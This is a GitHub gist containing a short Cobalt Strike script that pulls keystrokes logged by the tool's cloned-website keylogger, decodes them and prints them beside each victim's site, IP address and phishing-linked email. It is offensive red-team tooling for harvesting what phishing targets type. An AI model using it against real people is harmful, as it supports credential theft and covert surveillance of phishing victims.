Skip to content

Instantly share code, notes, and snippets.

@rsmudge
Created August 10, 2016 19:44
Show Gist options
  • Save rsmudge/1ba07e9aa6016406bf67ba156bd0bc5f to your computer and use it in GitHub Desktop.
Save rsmudge/1ba07e9aa6016406bf67ba156bd0bc5f to your computer and use it in GitHub Desktop.
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
# convert comma separated keystroke values into a string.
sub toString {
local('@temp');
@temp = split(",", $1);
shift(@temp);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));
}
# grab our keystrokes
command pull {
local('$entry $site $ip $keystrokes $token $email $data');
foreach $entry (data_query("weblog")) {
if ($entry[0] eq "keylogger_hit") {
($null, $site, $ip, $keystrokes, $token) = $entry;
$email = tokenToEmail($token);
$data = toString($keystrokes);
println("$site $[20]ip $[20]email $data");
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment